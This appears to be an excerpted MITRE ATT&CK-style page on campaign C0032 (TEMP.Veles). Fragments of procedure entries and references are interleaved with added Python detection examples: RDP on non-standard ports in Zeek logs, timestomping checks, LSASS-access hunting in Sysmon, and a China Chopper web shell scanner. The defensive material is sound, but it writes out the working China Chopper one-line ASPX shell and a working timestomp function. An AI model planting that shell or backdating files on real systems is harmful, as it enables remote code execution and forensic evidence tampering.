…establish RDP connections, including ports 28035, 32467, 41578, and 46892. [22]
C0032 C0032: During the C0032 campaign, TEMP.Veles utilized RDP throughout an operation. [23]
S0030 Carbanak: Carbanak enables concurrent Remote Desktop Protocol (RDP) sessions. [24]
G0114 Chimera: Chime…
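The procedure examples above record RDP being run over ports such as 28035, 32467, 41578 and 46892 rather than 3389/tcp. A port-agnostic way to catch that is to trust a protocol analyser's classification instead of the port: Zeek's dynamic protocol detection fills conn.log's service column from the traffic itself, so an RDP session to 41578/tcp is still labelled rdp. The following is an added example (not code from the ATT&CK page or from any of the groups it lists) that parses constructed Zeek conn.log lines and flags (a) sessions DPD classified as RDP on a port where RDP is not expected and (b) sessions to the specific ports reported above, as a plain IOC match. The sample log lines, the host addresses, and the set of "standard" RDP ports are assumptions made for the example.

```python
"""Flag RDP sessions on non-standard ports in Zeek conn.log records.

Added example, not from the ATT&CK page. Zeek's dynamic protocol detection
fills the ``service`` column from the traffic itself, so an RDP session to
41578/tcp still shows ``service=rdp``. The log lines below are constructed.
"""
from dataclasses import dataclass

# Assumption: where RDP is expected in this environment.
RDP_STANDARD_PORTS = {3389}
# Ports named in the procedure example above, usable as a plain IOC list.
REPORTED_RDP_PORTS = {28035, 32467, 41578, 46892}

# Constructed sample conn.log (tab-separated, Zeek header format).
SAMPLE_CONN_LOG = """\
#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\tconn_state
#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tinterval\tstring
1709300001.100000\tCabc1\t10.0.5.23\t51022\t10.0.9.7\t3389\ttcp\trdp\t1823.4\tSF
1709300002.200000\tCabc2\t10.0.5.23\t51023\t10.0.9.7\t443\ttcp\tssl\t12.1\tSF
1709300003.300000\tCabc3\t10.0.5.40\t51900\t10.0.9.12\t41578\ttcp\trdp\t4410.9\tSF
1709300004.400000\tCabc4\t10.0.5.40\t51901\t10.0.9.13\t28035\ttcp\trdp,ssl\t77.0\tSF
1709300005.500000\tCabc5\t10.0.5.41\t51902\t10.0.9.14\t41578\ttcp\t-\t0.3\tS0
"""


@dataclass(frozen=True)
class Finding:
    uid: str
    orig_h: str
    resp_h: str
    resp_p: int
    service: str
    reason: str


def parse_conn_log(text):
    """Yield one dict per record, keyed by the names in the #fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split("\t")
        if fields is None or len(values) != len(fields):
            continue  # skip records that do not match the header
        yield dict(zip(fields, values))


def rdp_on_nonstandard_port(text, standard_ports=RDP_STANDARD_PORTS):
    """RDP confirmed by protocol detection, but not on an expected port."""
    out = []
    for rec in parse_conn_log(text):
        if rec["proto"] != "tcp":
            continue
        services = set(rec["service"].split(","))  # Zeek joins several services with commas
        port = int(rec["id.resp_p"])
        if "rdp" in services and port not in standard_ports:
            out.append(Finding(rec["uid"], rec["id.orig_h"], rec["id.resp_h"],
                               port, rec["service"], "rdp-on-nonstandard-port"))
    return out


def connections_to_reported_ports(text, ports=REPORTED_RDP_PORTS):
    """Plain port match: also catches sessions too short for DPD to classify."""
    out = []
    for rec in parse_conn_log(text):
        port = int(rec["id.resp_p"])
        if rec["proto"] == "tcp" and port in ports:
            out.append(Finding(rec["uid"], rec["id.orig_h"], rec["id.resp_h"],
                               port, rec["service"], "reported-port"))
    return out


if __name__ == "__main__":
    for f in rdp_on_nonstandard_port(SAMPLE_CONN_LOG) + connections_to_reported_ports(SAMPLE_CONN_LOG):
        print(f)
```

The two checks are complementary: the service-based one generalises beyond the four reported ports but misses the half-open session (Cabc5) that Zeek never classified, while the port list catches that session but is only as current as the IOC it encodes. Neither replaces a baseline of which hosts are allowed to accept RDP at all.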
…ed PowerShell to extract an encoded payload from within an .LNK file. [55] [56]
C0032 C0032: During the C0032 campaign, TEMP.Veles used PowerShell to perform timestomping. [57]
S0674 CharmPower: CharmPower can use PowerShell for payload execution and C2 communication. [58]
G0114 Ch…
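The C0032 entry above mentions timestomping via PowerShell (on Windows, an assignment such as `(Get-Item $f).LastWriteTime = '2019-06-12'`). What follows is an added example, not code from the ATT&CK page or from the actors it describes, showing the same technique on POSIX with os.utime and two cheap heuristics for spotting it: most timestomping tools write whole-second values while files the OS wrote itself carry sub-second precision on NTFS, ext4 and APFS, and on POSIX utime() bumps ctime to "now", leaving a stomped file with an mtime far older than its ctime. The demo directory, the file names, and the 30-day gap threshold are assumptions made for the example.

```python
"""Timestomping on POSIX, and two cheap checks for it.

Added example (not from the ATT&CK page). Most timestomping tools write
whole-second timestamps, while files the OS wrote itself carry sub-second
precision on NTFS, ext4 and APFS. The directory below is constructed.
"""
import os
import tempfile
import time
from datetime import datetime, timezone

NS_PER_S = 1_000_000_000


def timestomp(path, when):
    """Backdate atime and mtime to ``when`` at whole-second precision."""
    ts = int(when.timestamp())
    os.utime(path, (ts, ts))


def has_round_mtime(path):
    """Heuristic 1: mtime with a zero fractional second."""
    return os.stat(path).st_mtime_ns % NS_PER_S == 0


def mtime_ctime_gap_days(path):
    """Heuristic 2: utime() cannot set ctime, so a stomped file shows an
    mtime much older than its ctime (chmod/rename produce the same gap)."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) / 86400


def scan(root, gap_days=30):
    """Return sorted (path, reasons) for files tripping either heuristic.
    gap_days is an assumed tuning value."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            reasons = []
            if has_round_mtime(p):
                reasons.append("round-mtime")
            if mtime_ctime_gap_days(p) > gap_days:
                reasons.append("mtime-predates-ctime")
            if reasons:
                hits.append((p, reasons))
    return sorted(hits)


def build_demo():
    """Constructed tree: one untouched file, one stomped file."""
    root = tempfile.mkdtemp(prefix="timestomp_demo_")
    normal = os.path.join(root, "quarterly_report.docx")
    stomped = os.path.join(root, "WindowsUpdate.dll")
    for p in (normal, stomped):
        with open(p, "wb") as fh:
            fh.write(b"\x00" * 16)
    # Pin the untouched file to an odd nanosecond value so the demo does not
    # depend on the host filesystem's own timestamp granularity.
    now_ns = time.time_ns() | 1
    os.utime(normal, ns=(now_ns, now_ns))
    timestomp(stomped, datetime(2019, 6, 12, 8, 30, tzinfo=timezone.utc))
    return root, normal, stomped


if __name__ == "__main__":
    root, _, _ = build_demo()
    for path, reasons in scan(root):
        print(path, reasons)
```

Both heuristics are noisy: files copied from FAT media or from filesystems with one-second inodes have round timestamps, and any chmod or rename widens the mtime/ctime gap. On NTFS the stronger check is to compare $STANDARD_INFORMATION timestamps, which user-mode APIs can set, against $FILE_NAME timestamps, which they cannot; that requires reading the MFT rather than calling stat().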
…s: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020. Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020. Cristian Souza, Eduardo Ovalle, Ashley …
…ed various tools (such as Mimikatz and WCE) to perform credential dumping. [25]
C0032 C0032: During the C0032 campaign, TEMP.Veles used Mimikatz and a custom tool, SecHack, to harvest credentials. [26]
G0003 Cleaver: Cleaver has been known to dump credentials using Mimikatz and Win…
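The entries above describe credential harvesting with Mimikatz and similar tools, which work by reading LSASS process memory. Sysmon records that as Event ID 10 (ProcessAccess) with PROCESS_VM_READ (0x0010) set in GrantedAccess. The following is an added example, not code from the ATT&CK page or from any of the groups or tools it names, that runs that logic over constructed Sysmon records in JSON-lines form: it ignores opens that lack VM_READ (Task Manager's query-only handle), ignores an assumed allow-list of OS components that legitimately open LSASS, and raises severity when the CallTrace contains a frame not backed by a module on disk. The events, the paths, and the allow-list are assumptions to be tuned per environment.

```python
"""Flag suspicious handle opens on lsass.exe in Sysmon Event ID 10 records.

Added example, not from the ATT&CK page. Credential dumpers such as Mimikatz
read LSASS memory, which Sysmon logs as ProcessAccess with PROCESS_VM_READ in
GrantedAccess. The events below are constructed JSON lines and the allow-list
is an assumption, not a vendor list.
"""
import json
from dataclasses import dataclass

PROCESS_VM_READ = 0x0010

# Assumed allow-list of OS components that legitimately open LSASS.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\lsm.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed sample events (one JSON object per line).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\csrss.exe+1a2b"},
    {"EventID": 10, "SourceImage": r"C:\Users\svc_backup\AppData\Local\Temp\mk.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Users\svc_backup\AppData\Local\Temp\mk.exe+1f3a0"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\Taskmgr.exe+4c21"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(000001A2B3C4D5E6)"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\notepad.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe"},
])


@dataclass(frozen=True)
class Finding:
    source: str
    granted: int
    severity: str


def parse_events(text):
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def assess(ev):
    """Return a Finding for a suspicious LSASS access, else None."""
    if ev.get("EventID") != 10:
        return None
    target = ev.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    if not granted & PROCESS_VM_READ:
        return None  # query-only handles cannot read credential material
    source = ev.get("SourceImage", "").lower()
    if source in ALLOWED_SOURCES:
        return None
    # A frame with no backing module on disk points at injected or reflective code.
    severity = "high" if "UNKNOWN" in ev.get("CallTrace", "") else "medium"
    return Finding(ev.get("SourceImage", ""), granted, severity)


def hunt(text):
    return [f for f in (assess(e) for e in parse_events(text)) if f]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

The allow-list is the weak point: an attacker who injects into an allowed process, or names a binary after one from a different directory, slips through a name-only match, so production rules should key on signer and full path and keep the list short. Conversely, EDR agents, WMI providers and some backup software open LSASS with VM_READ legitimately, so expect tuning before this fires only on dumpers.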
… For C0018, the threat actors renamed a Sliver payload to vmware_kb.exe. [38]
C0032 C0032: During the C0032 campaign, TEMP.Veles renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files. [39]
S0274 Calisto: Calisto's insta…
…ed JScript web shells through the creation of malicious ViewState objects. [19]
C0032 C0032: During the C0032 campaign, TEMP.Veles planted Web shells on Outlook Exchange servers. [20]
S0020 China Chopper: China Chopper's server component is a Web Shell payload. [2]
G1012 CURIUM: CU…
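The entries above cover web shells on Exchange servers and China Chopper, whose server side is a one-line ASP.NET page that passes a request parameter straight to eval(). The following is an added example, not code from the ATT&CK page or from the China Chopper project, that scans a web root for that pattern and its usual companions (a JScript page directive and the "unsafe" eval mode) in files IIS would actually execute, and ignores the same text in a non-script file. The directory layout, file names, the patterns and their weights, and the score threshold are assumptions made for the example; the shell text used as sample content is the well-known one-liner.

```python
"""Scan a web root for China Chopper-style ASP.NET web shells.

Added example, not from the ATT&CK page. China Chopper's server side is a
one-liner that passes a request parameter to eval(); the scanner looks for
that pattern in script files under an IIS/Exchange web root. The tree, the
files, the pattern weights and the threshold are constructed assumptions.
"""
import os
import re
import tempfile

# (pattern, weight, label). eval(Request...) alone is decisive; the others
# add confidence. A production scanner would add file-integrity baselines.
SHELL_PATTERNS = [
    (re.compile(r'eval\s*\(\s*Request\s*[.\[]', re.I), 2, "eval-request"),
    (re.compile(r'Language\s*=\s*"?Jscript"?', re.I), 1, "jscript-directive"),
    (re.compile(r'"unsafe"', re.I), 1, "unsafe-eval-mode"),
]
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp"}

# Sample content: the classic one-liner and a benign OWA-style page header.
CHOPPER_ASPX = '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>'
BENIGN_ASPX = ('<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="logon.aspx.cs" '
               'Inherits="Owa.Logon" %>\n<html><body>Sign in</body></html>')


def score_file(path, max_bytes=65536):
    """Return (score, matched labels) for the first max_bytes of a file."""
    try:
        with open(path, "r", errors="replace") as fh:
            head = fh.read(max_bytes)
    except OSError:
        return 0, []
    matched = [(w, label) for pat, w, label in SHELL_PATTERNS if pat.search(head)]
    return sum(w for w, _ in matched), [label for _, label in matched]


def scan_webroot(root, min_score=2):
    """Sorted (relative path, score, labels) for script files at or above min_score."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue  # IIS will not execute it, so it is not a live shell
            p = os.path.join(dirpath, name)
            score, labels = score_file(p)
            if score >= min_score:
                hits.append((os.path.relpath(p, root).replace(os.sep, "/"), score, labels))
    return sorted(hits)


def build_demo():
    """Constructed web root: benign logon page, a dropped shell, and shell text in a .txt."""
    root = tempfile.mkdtemp(prefix="webroot_demo_")
    os.makedirs(os.path.join(root, "owa", "auth"))
    os.makedirs(os.path.join(root, "aspnet_client"))
    with open(os.path.join(root, "owa", "auth", "logon.aspx"), "w") as fh:
        fh.write(BENIGN_ASPX)
    with open(os.path.join(root, "aspnet_client", "system_web.aspx"), "w") as fh:
        fh.write(CHOPPER_ASPX)
    with open(os.path.join(root, "aspnet_client", "readme.txt"), "w") as fh:
        fh.write(CHOPPER_ASPX)
    return root


if __name__ == "__main__":
    for hit in scan_webroot(build_demo()):
        print(hit)
```

Content matching only finds shells that look like the classic one-liner; an encoded or split variant scores zero. Pair it with a baseline of script files that should exist under the web root, with the creation time of new .aspx files against the IIS request log, and with process telemetry (w3wp.exe spawning cmd.exe or powershell.exe), which catches the shell when it is used rather than when it is dropped.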
…etrieved January 5, 2023. Sierra, E., Iglesias, G. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020. Miller-Osborn, J. and Grunzweig, J. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieve…
…uly 5, 2023. Hunt & Hackett Research Team. (2024, January 5). Turkish espionage campaigns in the Netherlands. Retrieved November 20, 2024. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. Cro…
…ra, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020. Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022. CERT-EE. (2021, January 27). Gamaredon Infect…
…27, 2021. Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018. Joey Chen, Cisco Talos. (2025, February 27). Lotus Blossom espionage group targets multiple industries with different versions of…
…er 7). Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns. Retrieved June 13, 2024. DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016. Dell SecureWorks Counter Threat Unit Threat Intelligence. (…
…dhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022. Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019. Raggi, M., Schwarz, D. (2019, August 1). LookBack Malw…